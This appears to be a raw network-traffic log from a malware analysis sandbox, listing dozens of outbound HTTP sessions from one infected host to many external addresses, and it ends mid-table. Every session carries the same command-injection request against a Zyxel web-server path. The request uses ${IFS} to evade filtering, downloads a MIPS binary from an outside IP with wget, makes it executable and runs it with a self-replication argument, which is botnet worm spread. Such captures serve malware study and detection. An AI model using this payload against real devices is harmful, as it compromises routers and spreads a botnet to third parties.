                                      Jan 19, 2024 17:29:20.542119026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1427192.168.2.1455804122.222.89.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542155027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1428192.168.2.145555439.102.217.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542182922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1429192.168.2.1446474186.132.17.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542218924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1430192.168.2.146075664.20.250.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542268038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1431192.168.2.1436250151.18.4.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542315960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1432192.168.2.1445738148.24.63.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542381048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1433192.168.2.144775481.64.200.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542397022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1434192.168.2.1453772195.39.210.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542419910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1435192.168.2.144805627.17.224.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542459011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1436192.168.2.1454438165.72.192.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542494059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1437192.168.2.145842232.30.45.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542541981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1438192.168.2.14540981.182.171.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542584896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1439192.168.2.1456080165.200.86.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542632103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1440192.168.2.144374891.20.189.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542670965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1441192.168.2.14551341.20.68.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542712927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1442192.168.2.1459916114.26.96.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542749882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1443192.168.2.1457260213.94.246.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542815924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1444192.168.2.145374893.151.106.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542819977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1445192.168.2.145281036.210.125.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542838097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1446192.168.2.1460296205.117.152.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542869091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1447192.168.2.1446084177.45.206.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542922020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1448192.168.2.1452042178.255.199.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542954922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1449192.168.2.143830212.224.4.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542968988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1450192.168.2.1434840155.43.148.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.542999029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1451192.168.2.146061294.38.104.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543035984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1452192.168.2.1460642121.220.161.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543086052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1453192.168.2.1453126220.107.142.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543137074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1454192.168.2.145212869.82.24.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543179035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1455192.168.2.14328289.147.59.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543206930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1456192.168.2.1450912140.14.17.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543226957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1457192.168.2.145089082.61.65.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543258905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1458192.168.2.1454194113.16.63.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543291092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1459192.168.2.143774272.174.142.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543328047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1460192.168.2.1442430103.45.251.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543370008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1461192.168.2.1451480110.6.193.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543417931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1462192.168.2.1444210186.154.12.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543441057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1463192.168.2.1455916113.236.177.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543498993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1464192.168.2.1458680154.235.2.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543518066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1465192.168.2.1444258160.234.87.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543560028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1466192.168.2.144579892.75.71.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543601990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1467192.168.2.145168847.144.67.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543647051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1468192.168.2.1452468132.194.79.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543688059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1469192.168.2.1455442221.5.159.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543735027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1470192.168.2.14404344.235.22.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543778896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1471192.168.2.1438126146.69.91.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543808937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1472192.168.2.1450838104.62.115.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543869019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1473192.168.2.1440920120.57.44.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543915033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1474192.168.2.1452300112.109.196.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543963909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1475192.168.2.144799267.36.105.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.543998003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1476192.168.2.143588084.79.238.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544051886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1477192.168.2.1455284182.14.183.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544091940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1478192.168.2.1450938205.144.151.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544137955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1479192.168.2.1433546196.150.222.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544162989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1480192.168.2.1457930160.214.210.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544214964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1481192.168.2.144837251.86.29.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544276953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1482192.168.2.1439578103.117.78.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544317961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1483192.168.2.1442806105.94.46.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544357061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1484192.168.2.1438832197.84.9.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544383049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1485192.168.2.146027065.0.99.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544440985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1486192.168.2.1454848162.17.65.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544485092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1487192.168.2.144966643.106.227.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544528961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1488192.168.2.1460238154.177.234.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544572115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1489192.168.2.144532683.64.168.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544627905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1490192.168.2.1441152105.50.236.137443
                                      TimestampBytes transferredDirectionData
